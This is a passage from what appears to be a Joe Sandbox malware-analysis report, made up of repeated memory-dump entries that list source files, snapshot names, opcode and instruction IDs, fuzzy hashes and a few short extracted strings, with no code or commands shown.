                                                            • Opcode ID: 579737aaea55d6e8a32d718e051229a47bf8a770d87a100737b2c0ee0efd535c
                                                            • Instruction ID: 68afe70e76d0c440609ac5dfe6b3e1ebb0e2654e5d8f72ff568af3fec88a2885
                                                            • Opcode Fuzzy Hash: 579737aaea55d6e8a32d718e051229a47bf8a770d87a100737b2c0ee0efd535c
                                                            • Instruction Fuzzy Hash: 9411C3B4E0122A9FDB60DF28C944BA9BBB1EF49300F10D1EA981DA7705DB309E81DF50
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_aea0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 56806a79f68610b3f62f44704c5484792f3d0cdc42b3c6cb6192df281a3758bb
                                                            • Instruction ID: e224f3a46840cebde2315f2f17e750957da3e06e04833bf6af4e8c6edf628d28
                                                            • Opcode Fuzzy Hash: 56806a79f68610b3f62f44704c5484792f3d0cdc42b3c6cb6192df281a3758bb
                                                            • Instruction Fuzzy Hash: BB015AB0E0122A9FCB64CF24C8817E9BBF1BB58304F1090E5D05DE7205EA309E808F50
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_aea0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3cd859a70379af85c7b8bd95be193daa2def6a9743dc98a6e149ac9ddd49a20a
                                                            • Instruction ID: 25be9a2bd7d8246eafabc194e15a6a3d5d07283cd46de0f3605ef5c454e83680
                                                            • Opcode Fuzzy Hash: 3cd859a70379af85c7b8bd95be193daa2def6a9743dc98a6e149ac9ddd49a20a
                                                            • Instruction Fuzzy Hash: F4F0DAB5A112259FDB61DF58DD50BDDB7B9BB98300F5090A5E409E7310D630AE40CF24
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_aea0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9bc587c257c7f5993297a9a88b296b3b72a019c4d4aae7dec1791a5bf1015024
                                                            • Instruction ID: 0f5d5c3ffae80002515efc4f63cc52e83095445c8928797de1d4b4ab65f8447a
                                                            • Opcode Fuzzy Hash: 9bc587c257c7f5993297a9a88b296b3b72a019c4d4aae7dec1791a5bf1015024
                                                            • Instruction Fuzzy Hash: A9F07474A01228DFDBA0DF14C980B99FBB1AF45310F1494D9D449AB250DB31EE81CF51
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_aea0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f40f92b86f705d57e1cb8cc0ae5df3a8ba114c1e6a4f65b993aaaaa38b24a73f
                                                            • Instruction ID: fa93c2114ba3ae7bced98fbd2a6c863a1616d4615f19d3f37fcb1480f2a2e759
                                                            • Opcode Fuzzy Hash: f40f92b86f705d57e1cb8cc0ae5df3a8ba114c1e6a4f65b993aaaaa38b24a73f
                                                            • Instruction Fuzzy Hash: 64E0C9B5E401699FDBA4DB54CD41BDDB6BAEB94300F1090A5A509E6240DA30AE818F24
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_aea0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7d2fbb8245e0ef4233f207dbf2568eebe02c8650a9854025c239d5b1d70490f6
                                                            • Instruction ID: 34e47fbb649e4e717362f8ccaed5a4f74b2291752360137cf87d72b22ee97e3d
                                                            • Opcode Fuzzy Hash: 7d2fbb8245e0ef4233f207dbf2568eebe02c8650a9854025c239d5b1d70490f6
                                                            • Instruction Fuzzy Hash: FFF09B34A042189FCBA5CF54C880A99FBB2FB8A314F14D0D9D80DAB214DB31AE86CF54
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_aea0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: faf4fc76f1a7c6539f96013a07b4c7c2ea1555e6d9e6f2c49cf3f1825d68e1d1
                                                            • Instruction ID: 5faad073cf55fbdf326cd347eab919791077e61bdc79fba3af64cc1d0c398c68
                                                            • Opcode Fuzzy Hash: faf4fc76f1a7c6539f96013a07b4c7c2ea1555e6d9e6f2c49cf3f1825d68e1d1
                                                            • Instruction Fuzzy Hash: 33F0A534A04218DFDB64CF24C990A99FBB1EF89314F14D4DAD81DAB255CB31EE828F50
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9bed08f1eec2eba06bd7f49158ea347a6be1016568ec3cde1548943a6e4606a6
                                                            • Instruction ID: be387c7fb899e22c434bdab8d7473bfa65215db719af0f1436f714c272dc3699
                                                            • Opcode Fuzzy Hash: 9bed08f1eec2eba06bd7f49158ea347a6be1016568ec3cde1548943a6e4606a6
                                                            • Instruction Fuzzy Hash: BEE09274E10208EFCB94DFA9E448A9DBBF4EB48605F4081EAE808D7361E7349A44CF51
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530245195.000000000AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AEA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_aea0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc7d6d3644706829ab6cf3fd72537da6bdff3722718d47bb0377cdb95268e398
                                                            • Instruction ID: d9763b15bbecd63206fde80744fa8e7e07ac764f1c0320eaf4cfe0b613f9f42d
                                                            • Opcode Fuzzy Hash: fc7d6d3644706829ab6cf3fd72537da6bdff3722718d47bb0377cdb95268e398
                                                            • Instruction Fuzzy Hash: 0EE09270D11248AECBA4DFB8A08529CBFB1AB49215F1042A9C808A6201E7354A45DF40
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b24d35fc3d4c3e72a9090be6fe240dadbc3f4f52ef520bc0959e238781fa2ca7
                                                            • Instruction ID: 5e4a2fd952c6e547f4e4ff94f89f4a0839853d8b3bba9376fe8bf46f9d6097bb
                                                            • Opcode Fuzzy Hash: b24d35fc3d4c3e72a9090be6fe240dadbc3f4f52ef520bc0959e238781fa2ca7
                                                            • Instruction Fuzzy Hash: 23E01A70E0514EABDF14CFA8C9805AEBBB6BB84300F208129D108AB214D7309901CB40
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 178299cbc3458ebcb7b30331364be040acee05eba71505c8cf4e403d3305b9fc
                                                            • Instruction ID: 5806d1b52653265994ebd53f9975c40ae0e073a4c224dfbc9e0464a77a6b43e7
                                                            • Opcode Fuzzy Hash: 178299cbc3458ebcb7b30331364be040acee05eba71505c8cf4e403d3305b9fc
                                                            • Instruction Fuzzy Hash: 2AE01A7090122ACBEB94CF25DC80B8DB7B5BB45200F00C6A4C00DA3254DB305D85CF24
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: db7a1365327e6b7a4b6240702955f4fb6ddf6706d1ae5b884ba9c5ca37307319
                                                            • Instruction ID: f0d4f39928da5562eb019e0cbaa2e6e1dcceda4698806e1e62e2e1cc48208b8b
                                                            • Opcode Fuzzy Hash: db7a1365327e6b7a4b6240702955f4fb6ddf6706d1ae5b884ba9c5ca37307319
                                                            • Instruction Fuzzy Hash: B2D06C74502314CFC7298F28E188998BBB2FB09306F114998E40AAB268CB35DD84CF00
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: /YD9$/YD9$N%1f$N%1f
                                                            • API String ID: 0-2219766728
                                                            • Opcode ID: b3974851b30aa2f6ce07a84e26b7136c918a60fe31c630e37210f1886b04dc10
                                                            • Instruction ID: f04ef5fd8d625f69b46ce8e659c5c4b27406a76a89dc815f6cdba4d666831266
                                                            • Opcode Fuzzy Hash: b3974851b30aa2f6ce07a84e26b7136c918a60fe31c630e37210f1886b04dc10
                                                            • Instruction Fuzzy Hash: 48710274E092198FCB04CFAAD5818DEFBF6EB88210F64942AD905B7318D770DE42CB64
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: N%1f$N%1f
                                                            • API String ID: 0-2197160886
                                                            • Opcode ID: 911dc97dc133ddb60219a206a1c0a0309ca25a181c9ba214c48a3bd3121c8c87
                                                            • Instruction ID: ba15d85f4cc3ca92d13e24b1e1f664f49e646ce269856ee6706aedea0968c146
                                                            • Opcode Fuzzy Hash: 911dc97dc133ddb60219a206a1c0a0309ca25a181c9ba214c48a3bd3121c8c87
                                                            • Instruction Fuzzy Hash: 98710274E092198FCB04CFAAD5819DEFBF6EB88210F64942AD905B7318D774DE42CB64
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8u6k$8u6k
                                                            • API String ID: 0-1044929781
                                                            • Opcode ID: 9a424d5087585c90b3f57db0351b8776527383e98250dc400806a2b0b40dfea9
                                                            • Instruction ID: 8858ab97b4d89ffaafd0329c55555bbab7ac91d7c2f20996e71135f3d7a8d699
                                                            • Opcode Fuzzy Hash: 9a424d5087585c90b3f57db0351b8776527383e98250dc400806a2b0b40dfea9
                                                            • Instruction Fuzzy Hash: 5371EE70E50219DFDB54CFA9D58499EFBF6FF88310F148569D419AB214D330AA428F60
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8u6k$8u6k
                                                            • API String ID: 0-1044929781
                                                            • Opcode ID: ccba7c8c4e510329009c4ff00616f5af00bfb16ed5efd6ff0c6acb8bf0d82eb7
                                                            • Instruction ID: f5e904fd2eefc9332422cdb5e3a2f4b4786df69cb8d5d2a0edcabc969678ce99
                                                            • Opcode Fuzzy Hash: ccba7c8c4e510329009c4ff00616f5af00bfb16ed5efd6ff0c6acb8bf0d82eb7
                                                            • Instruction Fuzzy Hash: EA711170E50219DFDB54CFA9D58499EFBF6FF88310F14856AD419AB214D330AA42CFA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_abe0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Xq
                                                            • API String ID: 0-599127549
                                                            • Opcode ID: f2570804290f7308e60f98e5326d57be0f2d5040b8fd85295006cf251cf21881
                                                            • Instruction ID: 771548a174dec5fda11a1638a644e2137058e7ae9a02feb588c094433a303d27
                                                            • Opcode Fuzzy Hash: f2570804290f7308e60f98e5326d57be0f2d5040b8fd85295006cf251cf21881
                                                            • Instruction Fuzzy Hash: 55B1B634B10A45CBEB389BB5596533A76A6BFC0643F1949ADD887C7284CB30CC42EB56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 3^r
                                                            • API String ID: 0-2332874731
                                                            • Opcode ID: 5dc52e5f6c380d963fc62611c123231ccc9280c25b87cc3a88f7904b71993d36
                                                            • Instruction ID: 80de0a61d2c1c1dd67330f7798731f56cb233f4f138f144ae285ef39b8beb4ec
                                                            • Opcode Fuzzy Hash: 5dc52e5f6c380d963fc62611c123231ccc9280c25b87cc3a88f7904b71993d36
                                                            • Instruction Fuzzy Hash: 4E811575E052198FDB44CFAAD5819EEFBF2FF88310F14942AD419B7314D3349A428B65
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 3^r
                                                            • API String ID: 0-2332874731
                                                            • Opcode ID: 300edad884536fa47d0a5b248f862b6f63369e5add20d11b65b8137a35fac750
                                                            • Instruction ID: b4d3354b8ee6f50627e43883155d4b755de80186fe59d932df5d42544b49a096
                                                            • Opcode Fuzzy Hash: 300edad884536fa47d0a5b248f862b6f63369e5add20d11b65b8137a35fac750
                                                            • Instruction Fuzzy Hash: 1B61E274E05209CFDB48CFAAD5815EEFBF2FF88210F24952AD419B7214D7349A428F65
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: p
                                                            • API String ID: 0-2181537457
                                                            • Opcode ID: b8e4ec683807995e1299ee7f283dbc95bce90b23095593e8aaa53b6d7996f644
                                                            • Instruction ID: 400fdba54c95798e9885ed9aed145d418feb3835678cbbcba10b5cc2cf029a8c
                                                            • Opcode Fuzzy Hash: b8e4ec683807995e1299ee7f283dbc95bce90b23095593e8aaa53b6d7996f644
                                                            • Instruction Fuzzy Hash: 6061F7B0E05218CFEB14CF6AD940B9EFBF2AF89210F14C0AAD848A7255D7749D85CF56
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f5e166e4b3b470a7ae5867dacb11995def556b2ef994504a3e35f0ebdc738152
                                                            • Instruction ID: f4dce39cb0a69ca39d41f9255e6de8856c40b9999cedb7a21580dc452bf1a3d7
                                                            • Opcode Fuzzy Hash: f5e166e4b3b470a7ae5867dacb11995def556b2ef994504a3e35f0ebdc738152
                                                            • Instruction Fuzzy Hash: B0C12B74E042299FDB14CFA9D980AAEFBF2BF88304F248269D809A7355D7709D41CF61
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aa85b2679f156dea3917cebf3397c1637c4138a0e3c92dff7b8f968a75cf065a
                                                            • Instruction ID: 18970e14b2ef6f36ade3fca1aaabffa192e4246d1e14f99af1e8ae497aad7dc1
                                                            • Opcode Fuzzy Hash: aa85b2679f156dea3917cebf3397c1637c4138a0e3c92dff7b8f968a75cf065a
                                                            • Instruction Fuzzy Hash: A3B14D74E1131ADFDB04DFA8D880A9DBBB2FF88300F108669D559AB355DB70A946CF90
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_abe0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b775e918991131fa084188750119344c6346d64cfb4565cbf89ea0f143a8eb01
                                                            • Instruction ID: d83a58c9b0c644f89f7dad6c38603759cde16386852881dbd1cba4d2d12e19ce
                                                            • Opcode Fuzzy Hash: b775e918991131fa084188750119344c6346d64cfb4565cbf89ea0f143a8eb01
                                                            • Instruction Fuzzy Hash: 80A15974E142599FDB14DFA9C580AAEBBF2FF89200F2481AAD448A7316D7309981DF61
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_abe0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f0498e23536b90c0454265bf9fd39e5d7f7a6e2f33e35f11c4496ab4e3b6e33b
                                                            • Instruction ID: fe6082cc14360c519218f0e3b48a63a7e7a7a8775d4066c4f307f5991633b91e
                                                            • Opcode Fuzzy Hash: f0498e23536b90c0454265bf9fd39e5d7f7a6e2f33e35f11c4496ab4e3b6e33b
                                                            • Instruction Fuzzy Hash: 83A12A74E142199FDB14DFA9D580AAEFBF2FF89304F2481AAD409A7315D7309941DF60
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a861d8881dda55fb4d08e81959c5127c62c66e25016bffce544fb32047d27291
                                                            • Instruction ID: 8d2104699083f9578b72c2ebe451e10f51e6d5684e15442d6dd5180d8b9299cf
                                                            • Opcode Fuzzy Hash: a861d8881dda55fb4d08e81959c5127c62c66e25016bffce544fb32047d27291
                                                            • Instruction Fuzzy Hash: 34715674E0525ADFCB48CF99D480AAEFBB1FB89350F14D46AD916AB310C3749A81CF91
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 424ed7a9576aa944eb31232eabb9267f7d59d766f1a0a07a53b21ac1f87feadd
                                                            • Instruction ID: 421a7a584e6a106649d27509d8b7dc3e13ff81ff438fd33194e1d6ebb2a0042a
                                                            • Opcode Fuzzy Hash: 424ed7a9576aa944eb31232eabb9267f7d59d766f1a0a07a53b21ac1f87feadd
                                                            • Instruction Fuzzy Hash: 5C71E4B0E15219CFDB04CFA9D5805DEFBF6FB88210F24D42AE519F7224D734AA428B64
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 16bd28e92c1c82090e1b3136a40b1ef24eba319843c705ecc1420b40d2feae9a
                                                            • Instruction ID: 022af66520f32d343059b981f119dcbf421477d2e29f1e5c31c890d8a7146d75
                                                            • Opcode Fuzzy Hash: 16bd28e92c1c82090e1b3136a40b1ef24eba319843c705ecc1420b40d2feae9a
                                                            • Instruction Fuzzy Hash: 3871BD74E11219DFCB48CFA9D58499EFBF1FF89210F14C56AE819AB220D734AA41CF60
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5b040765bf12abbc757b1e77d3633de5707d94acd74010582572f130de6bfa6f
                                                            • Instruction ID: b3fb0ace4a60d6ffa2b642ff8e15c95510b274e1138019ec4ef62937215fb447
                                                            • Opcode Fuzzy Hash: 5b040765bf12abbc757b1e77d3633de5707d94acd74010582572f130de6bfa6f
                                                            • Instruction Fuzzy Hash: 2C61D174E1424ADFDB04CFAAD4809AEFBB5FF88310F14851AD419A7214D334E982CFA5
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba06605039f8fd71588d092f3d194c41cae102c10ef9b670cc5199eb2c135a7e
                                                            • Instruction ID: b5be134b3e48c7538d72386baaf806974c52d3f43ba97cd3af02a42b022730b6
                                                            • Opcode Fuzzy Hash: ba06605039f8fd71588d092f3d194c41cae102c10ef9b670cc5199eb2c135a7e
                                                            • Instruction Fuzzy Hash: 8A5109B4E0421A9BDB04CFAAD4816EEFBF6FF44300F14C56AD519AB204D73896518FA5
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6b3a2c9fb7d5323e9822b15aa310452da7f23e7c0c1f2a469f8582e02dae3668
                                                            • Instruction ID: 06b9c3e92145b09d750e19c19ca9bc11309499ce333b354637017567bfe718b7
                                                            • Opcode Fuzzy Hash: 6b3a2c9fb7d5323e9822b15aa310452da7f23e7c0c1f2a469f8582e02dae3668
                                                            • Instruction Fuzzy Hash: D0510374E05229DFCB44CF99DA809AEFBF6BB88210F548566E815A7314D370ED41CBA4
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 49be6615512cdd4c1ea4cd34fab2199076ba313a5f80531220cb2ca4a446b323
                                                            • Instruction ID: c17b8f063a1f3486fc6ec5de3f0fd5f31592fe2cd1e47a9d961cf5ea861dff27
                                                            • Opcode Fuzzy Hash: 49be6615512cdd4c1ea4cd34fab2199076ba313a5f80531220cb2ca4a446b323
                                                            • Instruction Fuzzy Hash: AD51F6B0D042699FCF04CFA9D880AEEBBF6BF48200F54816AD955A7344D7749A51CF94
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 73d430f9749055f826bc32f383a188ee6e172af2598534eb4b92e758ba821a74
                                                            • Instruction ID: a37adf0246c56220f34d16f3d0b8f9805cb11df4e45320144f42bcbd9301d1e9
                                                            • Opcode Fuzzy Hash: 73d430f9749055f826bc32f383a188ee6e172af2598534eb4b92e758ba821a74
                                                            • Instruction Fuzzy Hash: 825105B0E1520A9FDB04CFA9C5815EEFBF6BF89300F24D56AD409B7214E7349B418BA5
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1530446511.000000000D060000.00000040.00000800.00020000.00000000.sdmp, Offset: 0D060000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_d060000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f24a3d53bb691185f13a8813a1787a1abf26ab2da4e5a3df72118d598c51d11d
                                                            • Instruction ID: 7111833b631ebe1644854f378e6441269302851a6c6239d1263adad0545e6711
                                                            • Opcode Fuzzy Hash: f24a3d53bb691185f13a8813a1787a1abf26ab2da4e5a3df72118d598c51d11d
                                                            • Instruction Fuzzy Hash: 995105B0E1520ADFDB04CFA9C5815EEFBF6BB89310F24D16AD409B7214E7349B418BA5
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1529876006.000000000ABE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0ABE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_abe0000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 878bb566939d909c46102833043f18daba711f1eac0ae0b6dad2b940cdd3c4c1
                                                            • Instruction ID: fd254d445a0675a179f081035705077cdee05a6c450317789f9422e8832cf668
                                                            • Opcode Fuzzy Hash: 878bb566939d909c46102833043f18daba711f1eac0ae0b6dad2b940cdd3c4c1
                                                            • Instruction Fuzzy Hash: 2E416670E112189FDB58CFA9D985BDEFBF6BF88200F1480AAD908A7355D7309982CF51
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dd306953e3e4de1e1be07ea8ec0e695d41d8c054ea4e4bf86140b240a3dbb074
                                                            • Instruction ID: a1c9929cd6ec6aae39d1cd967cdc55b44128dbdc147219cef5faf73a8ddf6b03
                                                            • Opcode Fuzzy Hash: dd306953e3e4de1e1be07ea8ec0e695d41d8c054ea4e4bf86140b240a3dbb074
                                                            • Instruction Fuzzy Hash: 87411AB4E0521A8BCF44CFAAC5815AEFBF2BF88300F64C56AD805A7314D7749A41CB94
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1509042655.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_2d50000_screens.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eb8da70990cff89fba8e768d9c22c3b1a7e3541c74b64c39237b2ffeaa93af1e
                                                            • Instruction ID: b0e2ed61cf765af7d7f82fd31a85463955ea64ff8c7a8493b24e59fef54a4f02
